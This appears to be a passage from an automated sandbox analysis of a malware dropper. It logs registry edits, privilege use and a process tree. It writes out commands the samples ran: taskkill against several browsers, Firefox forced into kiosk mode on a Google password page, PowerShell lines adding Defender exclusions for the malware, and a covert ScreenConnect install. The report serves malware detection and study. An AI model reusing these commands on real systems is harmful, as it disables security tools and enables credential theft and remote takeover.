DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe -
Modifies registry class 38 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\PackageCode = "8D42856C30994BFA4B03410142FF69F8" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\e6cb77284cf765aa\\" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-e6cb77284cf765aa\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\e6cb77284cf765aa\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\ProductIcon = "C:\\Windows\\Installer\\{C65824D8-9903-AFB4-B430-141024FF968F}\\DefaultIcon" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList\Media msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\ = "ScreenConnect Client (e6cb77284cf765aa) Credential Provider" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (e6cb77284cf765aa)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C18BA22B6B7B3C7E6EBC7782C47F56AA\8D42856C30994BFA4B03410142FF69F8 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (e6cb77284cf765aa)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8D42856C30994BFA4B03410142FF69F8 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8D42856C30994BFA4B03410142FF69F8\Full msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-e6cb77284cf765aa msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\ProductName = "ScreenConnect Client (e6cb77284cf765aa)" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\shell\open msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C18BA22B6B7B3C7E6EBC7782C47F56AA msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList\Net msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\Clients = 3a0000000000 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\UseOriginalUrlEncoding = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\SourceList\PackageName = "setup.msi" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8D42856C30994BFA4B03410142FF69F8\Version = "402784266" msiexec.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3168 document.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 2520 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 748 skotes.exe 2120 ae1f140dbd.exe 2916 ee6c94c274.exe 912 0c3c2ef132.exe 2796 8d83f60acf.exe 912 0c3c2ef132.exe 3168 document.exe 3168 document.exe 2796 8d83f60acf.exe 2796 8d83f60acf.exe 3388 powershell.exe 3568 powershell.exe 3692 powershell.exe 3780 powershell.exe 3168 document.exe 3908 msiexec.exe 3908 msiexec.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1584 taskkill.exe Token: SeDebugPrivilege 1052 taskkill.exe Token: SeDebugPrivilege 2280 taskkill.exe Token: SeDebugPrivilege 1788 taskkill.exe Token: SeDebugPrivilege 2392 taskkill.exe Token: SeDebugPrivilege 3064 firefox.exe Token: SeDebugPrivilege 3064 firefox.exe Token: SeDebugPrivilege 2796 8d83f60acf.exe Token: SeDebugPrivilege 3168 document.exe Token: SeDebugPrivilege 3388 powershell.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeDebugPrivilege 3512 SupportClientSetup.exe Token: SeDebugPrivilege 3692 powershell.exe Token: SeDebugPrivilege 3780 powershell.exe Token: SeShutdownPrivilege 3872 msiexec.exe Token: SeIncreaseQuotaPrivilege 3872 msiexec.exe Token: SeRestorePrivilege 3908 msiexec.exe Token: SeTakeOwnershipPrivilege 3908 msiexec.exe Token: SeSecurityPrivilege 3908 msiexec.exe Token: SeCreateTokenPrivilege 3872 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3872 msiexec.exe Token: SeLockMemoryPrivilege 3872 msiexec.exe Token: SeIncreaseQuotaPrivilege 3872 msiexec.exe Token: SeMachineAccountPrivilege 3872 msiexec.exe Token: SeTcbPrivilege 3872 msiexec.exe Token: SeSecurityPrivilege 3872 msiexec.exe Token: SeTakeOwnershipPrivilege 3872 msiexec.exe Token: SeLoadDriverPrivilege 3872 msiexec.exe Token: SeSystemProfilePrivilege 3872 msiexec.exe Token: SeSystemtimePrivilege 3872 msiexec.exe Token: SeProfSingleProcessPrivilege 3872 msiexec.exe Token: SeIncBasePriorityPrivilege 3872 msiexec.exe Token: SeCreatePagefilePrivilege 3872 msiexec.exe Token: SeCreatePermanentPrivilege 3872 msiexec.exe Token: SeBackupPrivilege 3872 msiexec.exe Token: SeRestorePrivilege 3872 msiexec.exe Token: SeShutdownPrivilege 3872 msiexec.exe Token: SeDebugPrivilege 3872 msiexec.exe Token: SeAuditPrivilege 3872 msiexec.exe Token: SeSystemEnvironmentPrivilege 3872 msiexec.exe Token: SeChangeNotifyPrivilege 3872 msiexec.exe Token: SeRemoteShutdownPrivilege 3872 msiexec.exe Token: SeUndockPrivilege 3872 msiexec.exe Token: SeSyncAgentPrivilege 3872 msiexec.exe Token: SeEnableDelegationPrivilege 3872 msiexec.exe Token: SeManageVolumePrivilege 3872 msiexec.exe Token: SeImpersonatePrivilege 3872 msiexec.exe Token: SeCreateGlobalPrivilege 3872 msiexec.exe Token: SeCreateTokenPrivilege 3872 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3872 msiexec.exe Token: SeLockMemoryPrivilege 3872 msiexec.exe Token: SeIncreaseQuotaPrivilege 3872 msiexec.exe Token: SeMachineAccountPrivilege 3872 msiexec.exe Token: SeTcbPrivilege 3872 msiexec.exe Token: SeSecurityPrivilege 3872 msiexec.exe Token: SeTakeOwnershipPrivilege 3872 msiexec.exe Token: SeLoadDriverPrivilege 3872 msiexec.exe Token: SeSystemProfilePrivilege 3872 msiexec.exe Token: SeSystemtimePrivilege 3872 msiexec.exe Token: SeProfSingleProcessPrivilege 3872 msiexec.exe Token: SeIncBasePriorityPrivilege 3872 msiexec.exe Token: SeCreatePagefilePrivilege 3872 msiexec.exe Token: SeCreatePermanentPrivilege 3872 msiexec.exe Token: SeBackupPrivilege 3872 msiexec.exe -
Suspicious use of FindShellTrayWindow 17 IoCs
pid Process 2520 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 3064 firefox.exe 3064 firefox.exe 3064 firefox.exe 3064 firefox.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 3872 msiexec.exe 3872 msiexec.exe -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 912 0c3c2ef132.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 3064 firefox.exe 3064 firefox.exe 3064 firefox.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe 912 0c3c2ef132.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3168 document.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2520 wrote to memory of 748 2520 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 30 PID 2520 wrote to memory of 748 2520 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 30 PID 2520 wrote to memory of 748 2520 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 30 PID 2520 wrote to memory of 748 2520 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 30 PID 748 wrote to memory of 2120 748 skotes.exe 33 PID 748 wrote to memory of 2120 748 skotes.exe 33 PID 748 wrote to memory of 2120 748 skotes.exe 33 PID 748 wrote to memory of 2120 748 skotes.exe 33 PID 748 wrote to memory of 2916 748 skotes.exe 34 PID 748 wrote to memory of 2916 748 skotes.exe 34 PID 748 wrote to memory of 2916 748 skotes.exe 34 PID 748 wrote to memory of 2916 748 skotes.exe 34 PID 748 wrote to memory of 912 748 skotes.exe 35 PID 748 wrote to memory of 912 748 skotes.exe 35 PID 748 wrote to memory of 912 748 skotes.exe 35 PID 748 wrote to memory of 912 748 skotes.exe 35 PID 912 wrote to memory of 1584 912 0c3c2ef132.exe 36 PID 912 wrote to memory of 1584 912 0c3c2ef132.exe 36 PID 912 wrote to memory of 1584 912 0c3c2ef132.exe 36 PID 912 wrote to memory of 1584 912 0c3c2ef132.exe 36 PID 912 wrote to memory of 1052 912 0c3c2ef132.exe 39 PID 912 wrote to memory of 1052 912 0c3c2ef132.exe 39 PID 912 wrote to memory of 1052 912 0c3c2ef132.exe 39 PID 912 wrote to memory of 1052 912 0c3c2ef132.exe 39 PID 912 wrote to memory of 2280 912 0c3c2ef132.exe 41 PID 912 wrote to memory of 2280 912 0c3c2ef132.exe 41 PID 912 wrote to memory of 2280 912 0c3c2ef132.exe 41 PID 912 wrote to memory of 2280 912 0c3c2ef132.exe 41 PID 912 wrote to memory of 1788 912 0c3c2ef132.exe 43 PID 912 wrote to memory of 1788 912 0c3c2ef132.exe 43 PID 912 wrote to memory of 1788 912 0c3c2ef132.exe 43 PID 912 wrote to memory of 1788 912 0c3c2ef132.exe 43 PID 912 wrote to memory of 2392 912 0c3c2ef132.exe 45 PID 912 wrote to memory of 2392 912 0c3c2ef132.exe 45 PID 912 wrote to memory of 2392 912 0c3c2ef132.exe 45 PID 912 wrote to memory of 2392 912 0c3c2ef132.exe 45 PID 912 wrote to memory of 2384 912 0c3c2ef132.exe 47 PID 912 wrote to memory of 2384 912 0c3c2ef132.exe 47 PID 912 wrote to memory of 2384 912 0c3c2ef132.exe 47 PID 912 wrote to memory of 2384 912 0c3c2ef132.exe 47 PID 2384 wrote to memory of 3064 2384 firefox.exe 48 PID 2384 wrote to memory of 3064 2384 firefox.exe 48 PID 2384 wrote to memory of 3064 2384 firefox.exe 48 PID 2384 wrote to memory of 3064 2384 firefox.exe 48 PID 2384 wrote to memory of 3064 2384 firefox.exe 48 PID 2384 wrote to memory of 3064 2384 firefox.exe 48 PID 2384 wrote to memory of 3064 2384 firefox.exe 48 PID 2384 wrote to memory of 3064 2384 firefox.exe 48 PID 2384 wrote to memory of 3064 2384 firefox.exe 48 PID 2384 wrote to memory of 3064 2384 firefox.exe 48 PID 2384 wrote to memory of 3064 2384 firefox.exe 48 PID 2384 wrote to memory of 3064 2384 firefox.exe 48 PID 3064 wrote to memory of 2472 3064 firefox.exe 49 PID 3064 wrote to memory of 2472 3064 firefox.exe 49 PID 3064 wrote to memory of 2472 3064 firefox.exe 49 PID 3064 wrote to memory of 2520 3064 firefox.exe 50 PID 3064 wrote to memory of 2520 3064 firefox.exe 50 PID 3064 wrote to memory of 2520 3064 firefox.exe 50 PID 3064 wrote to memory of 2520 3064 firefox.exe 50 PID 3064 wrote to memory of 2520 3064 firefox.exe 50 PID 3064 wrote to memory of 2520 3064 firefox.exe 50 PID 3064 wrote to memory of 2520 3064 firefox.exe 50 PID 3064 wrote to memory of 2520 3064 firefox.exe 50 PID 3064 wrote to memory of 2520 3064 firefox.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe"C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Users\Admin\AppData\Local\Temp\1006867001\ae1f140dbd.exe"C:\Users\Admin\AppData\Local\Temp\1006867001\ae1f140dbd.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2120
-
-
C:\Users\Admin\AppData\Local\Temp\1006868001\ee6c94c274.exe"C:\Users\Admin\AppData\Local\Temp\1006868001\ee6c94c274.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2916
-
-
C:\Users\Admin\AppData\Local\Temp\1006869001\0c3c2ef132.exe"C:\Users\Admin\AppData\Local\Temp\1006869001\0c3c2ef132.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.0.1980041515\1655493434" -parentBuildID 20221007134813 -prefsHandle 1236 -prefMapHandle 1228 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e6946c4-c956-4add-a455-ecec750d9862} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 1300 10fd6e58 gpu6⤵PID:2472
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.1.1436625570\1371608418" -parentBuildID 20221007134813 -prefsHandle 1504 -prefMapHandle 1500 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b247f95-9778-4092-a225-07b99a8381f4} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 1516 e71b58 socket6⤵PID:2520
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.2.1935744822\1950471748" -childID 1 -isForBrowser -prefsHandle 2084 -prefMapHandle 2080 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e948e8df-aaea-4aa6-a550-f65ca896e70c} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 2096 1a3c2f58 tab6⤵PID:1808
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.3.708842068\104788742" -childID 2 -isForBrowser -prefsHandle 2956 -prefMapHandle 2952 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {98d40ce2-45a2-4596-9e5e-a628f8adb8a9} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 2968 e64b58 tab6⤵PID:1984
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.4.1012315112\1404219731" -childID 3 -isForBrowser -prefsHandle 3552 -prefMapHandle 3056 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e01bd58-cbe9-474a-8dee-c23a4fb7165e} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 3564 1c9e8658 tab6⤵PID:2208
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.5.279028253\1800956913" -childID 4 -isForBrowser -prefsHandle 3664 -prefMapHandle 3668 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {18a2f49e-4137-4b8a-9900-2e197a565d8e} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 3652 1e89b258 tab6⤵PID:1132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.6.629795120\1314682877" -childID 5 -isForBrowser -prefsHandle 3608 -prefMapHandle 3640 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {543e6a58-803d-4e4d-a290-b225fbcf647c} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 3752 1ee75258 tab6⤵PID:1688
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1006870001\8d83f60acf.exe"C:\Users\Admin\AppData\Local\Temp\1006870001\8d83f60acf.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Users\Admin\AppData\Local\Temp\1006871001\document.exe"C:\Users\Admin\AppData\Local\Temp\1006871001\document.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3168 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1006871001\document.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3388
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'document.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3568
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
-
C:\Users\Admin\AppData\Local\Temp\1006872001\SupportClientSetup.exe"C:\Users\Admin\AppData\Local\Temp\1006872001\SupportClientSetup.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3512 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3872
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
